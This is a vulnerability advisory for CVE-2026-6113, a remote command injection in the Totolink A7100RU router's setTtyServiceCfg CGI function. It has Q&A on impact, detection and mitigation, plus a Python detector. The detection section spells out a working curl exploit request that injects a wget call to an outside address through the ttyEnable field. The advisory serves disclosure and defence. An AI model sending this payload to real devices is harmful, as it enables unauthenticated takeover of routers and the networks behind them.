CVE-2026-6113
Received - Intake
Remote OS Command Injection in Totolink A7100RU CGI Handler

Publication date: 2026-04-12

Last updated on: 2026-04-12

Assigner: VulDB

Description
A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setTtyServiceCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument ttyEnable leads to OS command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.
Meta Information
Published: 2026-04-12
Last Modified: 2026-04-12
Generated: 2026-05-07
AI Q&A: 2026-04-12
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Showing 1 associated CPE
Vendor: totolink
Product: a7100ru
Version / Range: 7.4cu.2313_b20191024
CWE
CWE-77: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78: The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-6113 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI Handler component, specifically in the function setTtyServiceCfg within the /cgi-bin/cstecgi.cgi file. The vulnerability arises because the user-supplied parameter "ttyEnable" is not properly sanitized before being used in a system command execution function.

An attacker can send a specially crafted POST request to the router that includes malicious commands in the ttyEnable parameter. These commands are then executed by the router's operating system, allowing the attacker to run arbitrary system commands remotely.

A proof of concept shows that an attacker can use this vulnerability to run commands on the device, for example downloading a file from a remote server by injecting a `wget` command.


How can this vulnerability impact me?

This vulnerability allows remote attackers to execute arbitrary system commands on the affected TOTOLINK A7100RU router without any authentication.

  • Attackers can take full control of the device, potentially altering its configuration or using it as a foothold to attack other devices on the network.
  • It can lead to unauthorized access, data theft, or disruption of network services.
  • Malicious commands could be used to download and execute malware, exfiltrate sensitive information, or create persistent backdoors.

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for specially crafted POST requests sent to the endpoint /cgi-bin/cstecgi.cgi that include the parameter ttyEnable with suspicious or command injection payloads.

A proof of concept involves sending a POST request with a JSON body containing "topicurl" set to "setTtyServiceCfg" and the "ttyEnable" parameter set to a command such as `wget 192.168.6.1:7777/testpoc`.

To detect exploitation attempts, you can use network monitoring tools or intrusion detection systems to look for HTTP POST requests to /cgi-bin/cstecgi.cgi with suspicious payloads in the ttyEnable parameter.

Example command using curl to test if the device is vulnerable (do not run on production without authorization):

  • curl -X POST http://<target-ip>/cgi-bin/cstecgi.cgi -H "Content-Type: application/json" -d '{"topicurl":"setTtyServiceCfg","ttyEnable":"wget 192.168.6.1:7777/testpoc"}'

What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the affected device's management interface, especially blocking remote access to the /cgi-bin/cstecgi.cgi endpoint.

Additionally, monitor and filter incoming HTTP POST requests to detect and block attempts to exploit the ttyEnable parameter.

If possible, update the firmware of the Totolink A7100RU router to a version that patches this vulnerability or apply any vendor-provided security updates.

As a temporary measure, disable or restrict the CGI Handler component or the setTtyServiceCfg function if configurable.
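
The detection and filtering described above (flagging POST requests to /cgi-bin/cstecgi.cgi whose ttyEnable value is suspicious), sketched as an allowlist check. This is an added example, not code from the vendor or the advisory; the function names, the 0/1 allowlist for ttyEnable and the sample requests are assumptions constructed for illustration.

```python
import json
import re

ENDPOINT = "/cgi-bin/cstecgi.cgi"
TOPIC = "setTtyServiceCfg"
# Assumption (not stated on the page): a legitimate ttyEnable is a 0/1 flag.
ALLOWED = re.compile(r"[01]")
# Fallback extractor for bodies that are not strictly valid JSON.
RAW_FIELD = re.compile(r'"ttyEnable"\s*:\s*("(?:[^"\\]|\\.)*"|[^,}\s]+)')

def classify(method, path, body):
    """Return 'ignore', 'ok' or 'alert' for one HTTP request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return "ignore"
    try:
        doc = json.loads(body)
    except ValueError:
        doc = None
    if isinstance(doc, dict):
        if doc.get("topicurl") != TOPIC:
            return "ignore"
        if "ttyEnable" not in doc:
            return "ok"
        value = str(doc["ttyEnable"])
    else:
        # A lenient device-side parser may still accept what json.loads rejects.
        match = RAW_FIELD.search(body)
        if TOPIC not in body or match is None:
            return "ignore"
        value = match.group(1).strip('"')
    return "ok" if ALLOWED.fullmatch(value) else "alert"

# Constructed sample traffic; the payload string is the one quoted on this page.
POC = '"ttyEnable":"wget 192.168.6.1:7777/testpoc"'
SAMPLES = [
    ("POST", ENDPOINT, '{"topicurl":"setTtyServiceCfg","ttyEnable":"1"}'),
    ("POST", ENDPOINT, '{"topicurl":"setTtyServiceCfg",' + POC + '}'),
    ("POST", ENDPOINT, '{"topicurl":"setTtyServiceCfg",' + POC + ',}'),  # bad JSON
    ("POST", ENDPOINT, '{"topicurl":"otherTopic","ttyEnable":"1"}'),
    ("GET", "/index.html", ""),
]

def scan(requests):
    """Classify each (method, path, body) tuple in order."""
    return [classify(*r) for r in requests]

if __name__ == "__main__":
    for req, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(verdict, req[2][:60])
```

The check is an allowlist because the payload quoted on this page contains no shell metacharacters, so a filter that only looks for characters such as `;` or `|` would let it through.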


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The CVE-2026-6113 vulnerability allows remote attackers to execute arbitrary system commands on the affected Totolink A7100RU router due to insufficient input sanitization in the setTtyServiceCfg function. This type of vulnerability can lead to unauthorized access, data breaches, and potential compromise of sensitive information.

Such security weaknesses can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require organizations to protect personal and sensitive data against unauthorized access and ensure the integrity and confidentiality of systems processing such data.

If exploited, this vulnerability could result in data exposure or system control loss, thereby violating requirements for data protection, incident response, and risk management mandated by these regulations.

